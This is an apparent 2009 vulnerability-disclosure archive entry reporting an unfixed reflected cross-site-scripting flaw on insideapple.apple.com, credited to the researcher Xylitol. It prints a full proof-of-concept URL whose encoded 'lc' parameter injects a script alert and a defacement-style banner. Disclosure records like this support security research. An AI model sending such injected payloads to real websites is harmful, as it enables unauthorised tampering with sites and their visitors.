Security researcher Xylitol, has submitted on 20/04/2009 a cross-site-scripting (XSS) vulnerability affecting insideapple.apple.com, which at the time of submission ranked 68 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 20/04/2009 |
Date published: 11/06/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Xylitol |
Domain: insideapple.apple.com |
Category: XSS |
Pagerank: 68 |
|---|
URL: http://insideapple.apple.com/updateacct/cbx-cgi.do?v=2&la=fr&lc=fr%27%22%3E%3C/TITLE%3E%3CSCRIPT%3Ea
lert(%22XSS%22);%3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20by%20Xylitol%3C/H1%3E%3C
/MARQUEE%3E |
|
Click here to view the mirror
|
|
|
| 
